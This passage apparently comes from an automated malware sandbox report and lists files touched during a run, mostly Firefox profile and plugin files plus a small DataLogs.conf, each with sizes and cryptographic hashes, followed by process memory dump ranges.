                                0e528c3b61f6c425b5654e2e2d195aa6e4ea1b73

                                SHA256

                                073485a2ba6ee40d13c9ee394e42e7cbaa358d3c8468536bcd82177741f319a2

                                SHA512

                                d2080f10f9cc8b350762297bd75c9a9c635cecb83faf0b98aea6ef3d6d37f42bb46e779df3ca981e972a613bfafc7e6bf9ba94638bc832989f9752188adff59f

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\db\data.safe.tmp

                                Filesize

                                15KB

                                MD5

                                8291a8749eec7ccafe3671e13346ea98

                                SHA1

                                a5894770d49c90032b41b31f1bc62bb200f0a147

                                SHA256

                                180d426fe987460c6bd1e07b5c0e71f40f016ae5c86feaaaa4ccd23837846610

                                SHA512

                                1e7667527d716c2ac94a79ed533e2dfb533b506fcbd3432fc0d6d436ce992cddd7094309d7d6c9859b66801f48ac1f188b8571f9bc1d6d7e52a4a1fc2d65b4a8

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\6ab1b32e-6ac0-4f22-9abd-115ef60aa7a4

                                Filesize

                                982B

                                MD5

                                4e146e7562046a1380c7e619e4900d74

                                SHA1

                                47ad1745f47e3a68ecf86ef0876c9704e51f30b5

                                SHA256

                                c45b25cbad37a22e132af85b58905e08b4de3f2076dc860abf3dd660f9553f2c

                                SHA512

                                2de1113c1fe8db5197a8811cd9d6df799f47bd772b147961e4a84681d431c7a95d652bd314f2f6d9858f79d179f4d2fee0dab0aa75565df0c567b5585893ecdd

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\85de6848-5615-4413-8ade-781fb370fb53

                                Filesize

                                671B

                                MD5

                                0ff6aa929c3de8ab0f9c6d9fed6337fd

                                SHA1

                                6ea08eba38451b83a917d38fe1ce3bea678a5d4c

                                SHA256

                                e7f41894f6e7a0e8e92852109766dcea4f609712af173e85be357c74c1db92da

                                SHA512

                                e28bc1c3d0c9bf55ba381f4cdf2ce45326550edcecefed85984c8fbf58f7df3e9f1822acb64d73391aa1655bd6184c3992ef4ae695be3d42202dd5baff8df848

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\datareporting\glean\pending_pings\cf99c831-4839-4639-9575-830a2c473a35

                                Filesize

                                26KB

                                MD5

                                9c883c89c82dc421c748fee59da77838

                                SHA1

                                26d66766590954b54cbf3cc1bcd805169d7d5e9f

                                SHA256

                                549504743bec21f3d7c48ee90b80a036b742dca2bf797f798b0cbb5deb0ce22b

                                SHA512

                                83d07236b7d270946b62151bf0a87d8ca7a56a2848d1ca9d68590a0e70448c51ccb566e69edb3b5930d55b92972864003e10f2e0f452e2b7daf648aa595f18ce

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

                                Filesize

                                1.1MB

                                MD5

                                842039753bf41fa5e11b3a1383061a87

                                SHA1

                                3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

                                SHA256

                                d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

                                SHA512

                                d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

                                Filesize

                                116B

                                MD5

                                2a461e9eb87fd1955cea740a3444ee7a

                                SHA1

                                b10755914c713f5a4677494dbe8a686ed458c3c5

                                SHA256

                                4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

                                SHA512

                                34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

                                Filesize

                                372B

                                MD5

                                bf957ad58b55f64219ab3f793e374316

                                SHA1

                                a11adc9d7f2c28e04d9b35e23b7616d0527118a1

                                SHA256

                                bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                SHA512

                                79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                Filesize

                                17.8MB

                                MD5

                                daf7ef3acccab478aaa7d6dc1c60f865

                                SHA1

                                f8246162b97ce4a945feced27b6ea114366ff2ad

                                SHA256

                                bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                SHA512

                                5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

                                Filesize

                                12KB

                                MD5

                                245492354f4898e71b762f24327925c3

                                SHA1

                                a042f8a23f50f4fffcbf8c1a59d49a18b78f088b

                                SHA256

                                a195de24602b95415c3d2501726216725dd9219760ef88ed2b4094c69422c4a0

                                SHA512

                                b70214e6477110fe872b57f45a26fe33be61f4f408d7158e96bfc4ad7461ca690e43c993fa28d6974811971b170592402c6ed07b8104479710fa861e2ad494ed

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

                                Filesize

                                10KB

                                MD5

                                d7884cc5624838005fdf32d408825a66

                                SHA1

                                0e36f9bc2fcb7a9cfb81794936956b1b9681b687

                                SHA256

                                6d550dca79d2926fa97ec7599efd87e8d0ef2584bc86bfb7c1c0efb8a3299dd8

                                SHA512

                                27881ac1afc1f09fe64988165ec6c97e92f865c1e69f713b6ba3dabf510b024e8b4e889d44402f5e5b791a30e25b1b9f5845b1ce31dc66aca3d90ceb8f794e21

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs-1.js

                                Filesize

                                15KB

                                MD5

                                66a8b9382dfecc4b346b7fbb8356ddbb

                                SHA1

                                a899e29d592d21e50f1fe650551e3944ac3487d6

                                SHA256

                                adb65ab0860042e08eda734e938d3dfb3a35b7b4bcb510669e4a4e7d85af8fee

                                SHA512

                                cd9c5ad6a85d937dd51a7e9d22e0d7063185c6e2d0b3c2f4331b81e1727d8f62248690053c6a0ceb302f04705aa7d88e80b528d0e4a245acc6bf70ef12340e56

                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ws2kncw.default-release\prefs.js

                                Filesize

                                10KB

                                MD5

                                9157788cb16ea5fb7c2bb29da64b53fe

                                SHA1

                                2a58375f6293fda0f3e3c6270e55f647a0151c92

                                SHA256

                                72f7243b24d50e414394faf1922b2735a4f7549387c315e5e615550fa3cbc414

                                SHA512

                                b278dafc1e8c314ec3df4f511485d8a41c7678984d604872a0680ae4f6f358c527c15aa09dd6445bf1edef2d28b8ff63f220574d82b8ac4f0c95441b0d5d0075

                              • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

                                Filesize

                                8B

                                MD5

                                cf759e4c5f14fe3eec41b87ed756cea8

                                SHA1

                                c27c796bb3c2fac929359563676f4ba1ffada1f5

                                SHA256

                                c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

                                SHA512

                                c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

                              • memory/404-3212-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/852-4-0x0000000000A90000-0x0000000000DAA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/852-0-0x0000000000A90000-0x0000000000DAA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/852-18-0x0000000000A91000-0x0000000000AF9000-memory.dmp

                                Filesize

                                416KB

                              • memory/852-15-0x0000000000A90000-0x0000000000DAA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/852-1-0x00000000772B4000-0x00000000772B6000-memory.dmp

                                Filesize

                                8KB

                              • memory/852-2-0x0000000000A91000-0x0000000000AF9000-memory.dmp

                                Filesize

                                416KB

                              • memory/852-3-0x0000000000A90000-0x0000000000DAA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/860-121-0x0000000000400000-0x0000000000418000-memory.dmp

                                Filesize

                                96KB

                              • memory/1160-124-0x0000000005A40000-0x0000000006068000-memory.dmp

                                Filesize

                                6.2MB

                              • memory/1160-123-0x0000000005290000-0x00000000052C6000-memory.dmp

                                Filesize

                                216KB

                              • memory/1160-132-0x0000000006120000-0x0000000006186000-memory.dmp

                                Filesize

                                408KB

                              • memory/1160-142-0x0000000006270000-0x00000000065C4000-memory.dmp

                                Filesize

                                3.3MB

                              • memory/1160-218-0x0000000008080000-0x00000000086FA000-memory.dmp

                                Filesize

                                6.5MB

                              • memory/1160-131-0x00000000059D0000-0x00000000059F2000-memory.dmp

                                Filesize

                                136KB

                              • memory/1160-206-0x0000000006890000-0x00000000068AE000-memory.dmp

                                Filesize

                                120KB

                              • memory/2376-88-0x0000000000EB0000-0x000000000133E000-memory.dmp

                                Filesize

                                4.6MB

                              • memory/2376-113-0x0000000000EB0000-0x000000000133E000-memory.dmp

                                Filesize

                                4.6MB

                              • memory/2652-222-0x0000000006ED0000-0x0000000006EF2000-memory.dmp

                                Filesize

                                136KB

                              • memory/2652-221-0x0000000006F40000-0x0000000006FD6000-memory.dmp

                                Filesize

                                600KB

                              • memory/2652-217-0x0000000006E10000-0x0000000006E2A000-memory.dmp

                                Filesize

                                104KB

                              • memory/2668-109-0x0000000000EE0000-0x0000000001568000-memory.dmp

                                Filesize

                                6.5MB

                              • memory/2668-111-0x0000000000EE0000-0x0000000001568000-memory.dmp

                                Filesize

                                6.5MB

                              • memory/2836-241-0x0000000000BC0000-0x0000000000E82000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/2836-243-0x0000000000BC0000-0x0000000000E82000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/2836-664-0x0000000000BC0000-0x0000000000E82000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/2836-682-0x0000000000BC0000-0x0000000000E82000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/2836-242-0x0000000000BC0000-0x0000000000E82000-memory.dmp

                                Filesize

                                2.8MB

                              • memory/2852-21-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-23-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-841-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-2893-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-3203-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-3209-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-67-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-3213-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-3214-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-3215-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-3216-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-1879-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-24-0x00000000005D1000-0x0000000000639000-memory.dmp

                                Filesize

                                416KB

                              • memory/2852-22-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-188-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-617-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-20-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-19-0x00000000005D1000-0x0000000000639000-memory.dmp

                                Filesize

                                416KB

                              • memory/2852-16-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2852-695-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/2940-246-0x0000000000CE0000-0x0000000000CF8000-memory.dmp

                                Filesize

                                96KB

                              • memory/3172-92-0x0000000008300000-0x0000000008366000-memory.dmp

                                Filesize

                                408KB

                              • memory/3172-117-0x00000000096B0000-0x00000000096BE000-memory.dmp

                                Filesize

                                56KB

                              • memory/3172-64-0x0000000000D20000-0x0000000001182000-memory.dmp

                                Filesize

                                4.4MB

                              • memory/3172-65-0x0000000000D20000-0x0000000001182000-memory.dmp

                                Filesize

                                4.4MB

                              • memory/3172-66-0x0000000000D20000-0x0000000001182000-memory.dmp

                                Filesize

                                4.4MB

                              • memory/3172-68-0x0000000007AE0000-0x0000000008084000-memory.dmp

                                Filesize

                                5.6MB

                              • memory/3172-86-0x0000000007690000-0x000000000769A000-memory.dmp

                                Filesize

                                40KB

                              • memory/3172-83-0x00000000076D0000-0x0000000007762000-memory.dmp

                                Filesize

                                584KB

                              • memory/3172-220-0x0000000000D20000-0x0000000001182000-memory.dmp

                                Filesize

                                4.4MB

                              • memory/3172-216-0x00000000096D0000-0x0000000009804000-memory.dmp

                                Filesize

                                1.2MB

                              • memory/3172-190-0x0000000009290000-0x00000000092DC000-memory.dmp

                                Filesize

                                304KB

                              • memory/3172-125-0x0000000009AD0000-0x0000000009BF2000-memory.dmp

                                Filesize

                                1.1MB

                              • memory/3172-119-0x0000000000D20000-0x0000000001182000-memory.dmp

                                Filesize

                                4.4MB

                              • memory/3172-91-0x0000000008910000-0x00000000089AC000-memory.dmp

                                Filesize

                                624KB

                              • memory/3172-118-0x0000000009840000-0x000000000985E000-memory.dmp

                                Filesize

                                120KB

                              • memory/3172-115-0x0000000007AD0000-0x0000000007ADE000-memory.dmp

                                Filesize

                                56KB

                              • memory/3172-116-0x0000000009520000-0x000000000952E000-memory.dmp

                                Filesize

                                56KB

                              • memory/3172-114-0x0000000009530000-0x00000000095A6000-memory.dmp

                                Filesize

                                472KB

                              • memory/3556-675-0x0000000010000000-0x000000001001C000-memory.dmp

                                Filesize

                                112KB

                              • memory/3556-808-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                Filesize

                                8.4MB

                              • memory/3556-1880-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                Filesize

                                8.4MB

                              • memory/3556-2063-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                Filesize

                                8.4MB

                              • memory/3556-571-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                Filesize

                                8.4MB

                              • memory/3556-694-0x0000000000400000-0x0000000000C6E000-memory.dmp

                                Filesize

                                8.4MB

                              • memory/3588-650-0x0000000005A20000-0x0000000005D74000-memory.dmp

                                Filesize

                                3.3MB

                              • memory/3992-87-0x00000000000B0000-0x00000000001B0000-memory.dmp

                                Filesize

                                1024KB

                              • memory/3992-45-0x00000000000B0000-0x00000000001B0000-memory.dmp

                                Filesize

                                1024KB

                              • memory/4288-663-0x0000000005CF0000-0x0000000005D3C000-memory.dmp

                                Filesize

                                304KB

                              • memory/6092-686-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB

                              • memory/6092-684-0x00000000005D0000-0x00000000008EA000-memory.dmp

                                Filesize

                                3.1MB